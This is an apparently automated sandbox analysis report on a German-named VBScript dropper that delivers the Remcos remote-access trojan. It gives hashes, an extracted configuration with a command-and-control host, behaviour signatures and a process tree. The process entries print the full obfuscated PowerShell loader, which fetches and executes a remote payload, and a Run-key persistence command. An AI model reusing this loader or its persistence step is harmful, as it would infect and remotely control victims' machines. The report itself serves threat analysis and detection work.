Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-11-2024 19:14
Static task
static1
Behavioral task
behavioral1
Sample
Beschwerde-AutoKauf.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Beschwerde-AutoKauf.vbs
Resource
win10v2004-20241007-en
General
-
Target
Beschwerde-AutoKauf.vbs
-
Size
67KB
-
MD5
4446681fce0cae163942eb162fd4ee76
-
SHA1
9c235cf72cebbbb0c5bd480add8f1c2db437b793
-
SHA256
7ab71eea03d84976609bb0ed19aa1b33b784731a357065900618ae4c3b8761db
-
SHA512
59dbcf1a8255e51f29825856cbeef269cf0584350570bb073dd5988a0ab2bbc6a8a13628405d30e7056b722b64be2e06e86ac576c0d1609dd524f0e1d95afb5f
-
SSDEEP
1536:TX7JwDwA6PgDQSjdOWZOVKgHrf6ZufkDt159fW7ajc:TXPIciZ+Korf6ZC2tdfW7ic
Malware Config
Extracted
remcos
TelOu62tos
www.tla-autos.com:9945
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
TeleAuto8926-8WB4GE
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 8 IoCs
flow pid Process 4 5088 powershell.exe 28 1756 powershell.exe 30 1756 powershell.exe 40 1756 powershell.exe 44 1756 powershell.exe 46 1756 powershell.exe 47 1756 powershell.exe 53 3604 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Afskibning = "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\\Software\\Firspandets\\').Davit;%Arerola142% ($Chamfrons)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1756 powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1756 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2024 reg.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 5088 powershell.exe 5088 powershell.exe 1756 powershell.exe 1756 powershell.exe 1756 powershell.exe 3604 powershell.exe 3604 powershell.exe 3604 powershell.exe 3604 powershell.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 5088 powershell.exe Token: SeDebugPrivilege 1756 powershell.exe Token: SeDebugPrivilege 3604 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1932 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe 1932 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3496 wrote to memory of 5088 3496 WScript.exe 83 PID 3496 wrote to memory of 5088 3496 WScript.exe 83 PID 1756 wrote to memory of 4916 1756 powershell.exe 103 PID 1756 wrote to memory of 4916 1756 powershell.exe 103 PID 1756 wrote to memory of 4916 1756 powershell.exe 103 PID 4916 wrote to memory of 2024 4916 cmd.exe 106 PID 4916 wrote to memory of 2024 4916 cmd.exe 106 PID 4916 wrote to memory of 2024 4916 cmd.exe 106 PID 1756 wrote to memory of 1932 1756 powershell.exe 108 PID 1756 wrote to memory of 1932 1756 powershell.exe 108 PID 1756 wrote to memory of 1932 1756 powershell.exe 108 PID 1756 wrote to memory of 1052 1756 powershell.exe 109 PID 1756 wrote to memory of 1052 1756 powershell.exe 109 PID 1756 wrote to memory of 1052 1756 powershell.exe 109 PID 1052 wrote to memory of 3604 1052 WScript.exe 110 PID 1052 wrote to memory of 3604 1052 WScript.exe 110 PID 1052 wrote to memory of 3604 1052 WScript.exe 110 PID 1932 wrote to memory of 3472 1932 AcroRd32.exe 113 PID 1932 wrote to memory of 3472 1932 AcroRd32.exe 113 PID 1932 wrote to memory of 3472 1932 AcroRd32.exe 113 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 2168 3472 RdrCEF.exe 114 PID 3472 wrote to memory of 4068 3472 RdrCEF.exe 115 PID 3472 wrote to memory of 4068 3472 RdrCEF.exe 115 PID 3472 wrote to memory of 4068 3472 RdrCEF.exe 115
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Beschwerde-AutoKauf.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');while (!$Unadduceable) {auspiciums (Hjemmemarkedernes ' $HegMilV oAdbA a DlD :KoSf t a da MlBrt,raSkn NkKde = A$PrMJ.e nd,t KaT,3M 8') ;auspiciums $Internes;auspiciums (Hjemmemarkedernes ' GsBltInaHeRBlTPa-S.sOlLnoEK EOxP S Qu4');auspiciums (Hjemmemarkedernes ' $ gKaLReo ,BriAbrl a:JuuUdN DAStDC dIrUVecSuEElaPabSalKaeF,=La( Otb e aSFoT -OmPN aSaTGlh b T$AfoUrk SVaE ,JT e M)') ;auspiciums (Hjemmemarkedernes 'Ch$FlGS,L ,oApBPraTrL o:NyR neUnsW usaBCosTit CADinFrt IbaA.lTBlI tnR g =Un$PuG.kL sOStbFiaCoL,i: UA GSMiHOsL ER s,as s+De+A %Un$PeRtoI onBonObi rEFo.RucSeoBluCoNPaT') ;$Ammunitionsfabrikkens=$Rinnie[$Resubstantiating]}$Catfacing=330712;$Phoning197=28597;auspiciums (Hjemmemarkedernes 'To$SmGjeL CoOvbUna uL A: GOH vlaED R,hc aH,P.nI etR A oL ,IMozMae = O CgCyeS tBa-O.cVaOFoNS.tTrE.uNSiT,r u$Pho TKGus,nE OjP e');auspiciums (Hjemmemarkedernes 'Co$OrgEplFaoMebSvaMilaf:,oFBarAna fS.rFlsE e ,lBleFrnS ,e=Cy ,[ iSBrylnsC t,heDim . CP,ofonMevr.eRnrBrt ]D.:Ma: VF Br tor m rBIsa esBeeFi6 T4 BSAbt .r diO nR gS ( i$.eO vA e rSkcFoa tpGti DtSca Sl siOvzB eSn)');auspiciums (Hjemmemarkedernes ' e$AfGSaLRoO rb,raAml.e: Ap Ve ynE.tSeA esSct Fo ,mInuBomAg Li=Ou [EnS Y uSG.T leG MOp.AfTPse.uxErtCa. rEPeNT.CLaODoD .iUnNAng r] A: ,:p A iS ecPhiDaiO .v gSlEPrtP S VtK r IB.NDegMa(sc$ByF Tr eA ifMaROpS,oeK L pEAnNqu)');auspiciums (Hjemmemarkedernes ' i$GrG hL ounBMea slFc:Udh pU aR ST iIHjGPar dUsuTAvECer ,SU =un$U,P PeRuN ,tL aFesRhTH,OMiMSouA MEv.BrS.eU bHeSTet ,rcai.in BgUl( $Soc a TSufO.aLoCKeI ,NOrGLe, s$ Fp eHlaORenBai eNReGGr1 9M 7In)');auspiciums $Hurtigruters;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');while (!$Unadduceable) {auspiciums (Hjemmemarkedernes ' $HegMilV oAdbA a DlD :KoSf t a da MlBrt,raSkn NkKde = A$PrMJ.e nd,t KaT,3M 8') ;auspiciums $Internes;auspiciums (Hjemmemarkedernes ' GsBltInaHeRBlTPa-S.sOlLnoEK EOxP S Qu4');auspiciums (Hjemmemarkedernes ' $ gKaLReo ,BriAbrl a:JuuUdN DAStDC dIrUVecSuEElaPabSalKaeF,=La( Otb e aSFoT -OmPN aSaTGlh b T$AfoUrk SVaE ,JT e M)') ;auspiciums (Hjemmemarkedernes 'Ch$FlGS,L ,oApBPraTrL o:NyR neUnsW usaBCosTit CADinFrt IbaA.lTBlI tnR g =Un$PuG.kL sOStbFiaCoL,i: UA GSMiHOsL ER s,as s+De+A %Un$PeRtoI onBonObi rEFo.RucSeoBluCoNPaT') ;$Ammunitionsfabrikkens=$Rinnie[$Resubstantiating]}$Catfacing=330712;$Phoning197=28597;auspiciums (Hjemmemarkedernes 'To$SmGjeL CoOvbUna uL A: GOH vlaED R,hc aH,P.nI etR A oL ,IMozMae = O CgCyeS tBa-O.cVaOFoNS.tTrE.uNSiT,r u$Pho TKGus,nE OjP e');auspiciums (Hjemmemarkedernes 'Co$OrgEplFaoMebSvaMilaf:,oFBarAna fS.rFlsE e ,lBleFrnS ,e=Cy ,[ iSBrylnsC t,heDim . CP,ofonMevr.eRnrBrt ]D.:Ma: VF Br tor m rBIsa esBeeFi6 T4 BSAbt .r diO nR gS ( i$.eO vA e rSkcFoa tpGti DtSca Sl siOvzB eSn)');auspiciums (Hjemmemarkedernes ' e$AfGSaLRoO rb,raAml.e: Ap Ve ynE.tSeA esSct Fo ,mInuBomAg Li=Ou [EnS Y uSG.T leG MOp.AfTPse.uxErtCa. rEPeNT.CLaODoD .iUnNAng r] A: ,:p A iS ecPhiDaiO .v gSlEPrtP S VtK r IB.NDegMa(sc$ByF Tr eA ifMaROpS,oeK L pEAnNqu)');auspiciums (Hjemmemarkedernes ' i$GrG hL ounBMea slFc:Udh pU aR ST iIHjGPar dUsuTAvECer ,SU =un$U,P PeRuN ,tL aFesRhTH,OMiMSouA MEv.BrS.eU bHeSTet ,rcai.in BgUl( $Soc a TSufO.aLoCKeI ,NOrGLe, s$ Fp eHlaORenBai eNReGGr1 9M 7In)');auspiciums $Hurtigruters;"1⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)"3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2024
-
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Schr. an GGV bzgl. Schadenersatzes.pdf"2⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=16164B341FD9D208AEB7DBF29328273A --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
- System Location Discovery: System Language Discovery
PID:2168
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=099972FF494EC969DF842C34852C22F5 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 